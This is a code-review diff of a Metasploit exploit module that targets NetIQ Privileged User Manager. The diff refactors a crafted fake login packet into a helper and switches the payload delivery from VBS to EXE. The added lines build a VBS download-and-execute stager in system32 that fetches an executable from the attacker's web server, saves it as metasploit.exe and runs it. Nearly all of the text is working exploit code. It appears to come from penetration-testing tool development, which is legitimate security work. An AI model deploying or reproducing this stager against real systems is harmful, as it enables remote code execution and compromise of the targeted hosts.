changes requested by egypt

modules/exploits/windows/novell/netiq_pum_eval.rb

@@ -61,15 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		data = "\x00\x00\x00\x00\x00\x01\x00\x15\x53\x50\x46\x2e\x55\x74"          #  ..........SPF.Ut
+		data = fake_login
-		data << "\x69\x6c\x2e\x63\x61\x6c\x6c\x4d\x6f\x64\x75\x6c\x65\x45\x78\x00" #  il.callModuleEx.
-		data << "\x02\x2f\x34\x00\x00\x00\x64\x0a\x00\x00\x00\x01\x03\x00\x03\x70" #  ./4...d........p
-		data << "\x6b\x74\x03\x00\x0b\x43\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73" #  kt...Credentials
-		data << "\x03\x00\x04\x6e\x61\x6d\x65\x02\x00\x04\x74\x65\x73\x74\x00\x06" #  ...name...test..
-		data << "\x70\x61\x73\x73\x77\x64\x02\x00\x04\x74\x65\x73\x74\x00\x00\x09" #  passwd...test...
-		data << "\x00\x06\x6d\x65\x74\x68\x6f\x64\x02\x00\x05\x6c\x6f\x67\x69\x6e" #  ..method...login
-		data << "\x00\x06\x6d\x6f\x64\x75\x6c\x65\x02\x00\x04\x61\x75\x74\x68\x00" #  ..module...auth.
-		data << "\x03\x75\x69\x64\x06\x00\x00\x09\x00\x00\x09";                    #  .uid.......
 
 		print_status("Sending fake login request...")
 
@@ -125,14 +117,14 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		vprint_status("on_request_uri called")
 
-		if (not @vbs_data)
+		if (not @exe_data)
-			print_error("A request came in, but the VBS archive wasn't ready yet!")
+			print_error("A request came in, but the EXE archive wasn't ready yet!")
 			return
 		end
 
-		print_good("Sending the VBS payload to the target...")
+		print_good("Sending the EXE payload to the target...")
-		send_response(cli, @vbs_data)
+		send_response(cli, @exe_data)
-		@vbs_sent = true
+		@exe_sent = true
 	end
 
 	def lookup_lhost()
@@ -144,8 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 	end
 
-	def exploit
+	def fake_login
-
 		data = "\x00\x00\x00\x00\x00\x01\x00\x15\x53\x50\x46\x2e\x55\x74"          #  ..........SPF.Ut
 		data << "\x69\x6c\x2e\x63\x61\x6c\x6c\x4d\x6f\x64\x75\x6c\x65\x45\x78\x00" #  il.callModuleEx.
 		data << "\x02\x2f\x34\x00\x00\x00\x64\x0a\x00\x00\x00\x01\x03\x00\x03\x70" #  ./4...d........p
@@ -155,6 +146,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		data << "\x00\x06\x6d\x65\x74\x68\x6f\x64\x02\x00\x05\x6c\x6f\x67\x69\x6e" #  ..method...login
 		data << "\x00\x06\x6d\x6f\x64\x75\x6c\x65\x02\x00\x04\x61\x75\x74\x68\x00" #  ..module...auth.
 		data << "\x03\x75\x69\x64\x06\x00\x00\x09\x00\x00\x09";                    #  .uid.......
+		return data
+	end
+
+	def exploit
+
+		data = fake_login
 
 		print_status("Sending fake login request...")
 		res = send_request_cgi(
@@ -178,14 +175,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		svc_name = svc[3, svc_length]
 		vprint_status("SVC Found: #{svc_name}")
 
-		print_status("Generating the VBS Payload...")
+		print_status("Generating the EXE Payload...")
-		exe = generate_payload_exe
+		@exe_data = generate_payload_exe
-		@vbs_data = Msf::Util::EXE.to_exe_vbs(exe)
+		exename = Rex::Text.rand_text_alpha(1+rand(2))
-		vbsname = Rex::Text.rand_text_alpha(1+rand(2))
 
 		print_status("Setting up the Web Service...")
 		datastore['SSL'] = false
-		resource_uri = '/' + vbsname + '.vbs'
+		resource_uri = '/' + exename + '.exe'
 		service_url = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_uri}"
 		print_status("Starting up our web service on #{service_url} ...")
 		start_service({'Uri' => {
@@ -196,15 +192,20 @@ class Metasploit3 < Msf::Exploit::Remote
 		}})
 		datastore['SSL'] = true
 
-		# VBS Stager 'stolen' from download_eval_vbs.rb
+		# http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/
-		xmlhttpvar = Rex::Text.rand_text_alpha(1+rand(2))
 		vbs_stage = Rex::Text.rand_text_alpha(3+rand(5))
-		code = "system(\"echo Set #{xmlhttpvar}=CreateObject(\\\"Microsoft.XMLHTTP\\\"):"+
+		code = "system(\"echo Set F=CreateObject(\\\"Microsoft.XMLHTTP\\\") >%WINDIR%/system32/#{vbs_stage}.vbs\");"
-			"#{xmlhttpvar}.Open \\\"GET\\\",\\\"#{service_url}\\\",False:"+
+		code << "system(\"echo F.Open \\\"GET\\\",\\\"#{service_url}\\\",False >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
-			"#{xmlhttpvar}.Send:"+
+		code << "system(\"echo F.Send >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
-			"Execute #{xmlhttpvar}.responseText > %WINDIR%/system32/#{vbs_stage}.vbs\");"
+		code << "system(\"echo Set IA=CreateObject(\\\"ADODB.Stream\\\") >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+		code << "system(\"echo IA.Type=1 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+		code << "system(\"echo IA.Open >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+		code << "system(\"echo IA.Write F.responseBody >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+		code << "system(\"echo IA.SaveToFile \\\"%WINDIR%\\system32\\metasploit.exe\\\",2 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
+		code << "system(\"echo CreateObject(\\\"WScript.Shell\\\").Run \\\"%WINDIR%\\system32\\metasploit.exe\\\" >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
 		code << "system(\"#{vbs_stage}.vbs\");"
 		register_file_for_cleanup("#{vbs_stage}.vbs")
+		register_file_for_cleanup("#{exename}.exe")
 		identity = ""
 
 		data = "\x00\x00\x00\x00\x00\x01"
@@ -273,14 +274,14 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		# wait for the data to be sent
-		print_status("Waiting for the victim to request the VBS payload...")
+		print_status("Waiting for the victim to request the EXE payload...")
 
 		waited = 0
-		while (not @vbs_sent)
+		while (not @exe_sent)
 			select(nil, nil, nil, 1)
 			waited += 1
 			if (waited > datastore['HTTP_DELAY'])
-				fail_with(Exploit::Failure::Unknown, "Target didn't request request the VBS payload -- Maybe it cant connect back to us?")
+				fail_with(Exploit::Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?")
 			end
 		end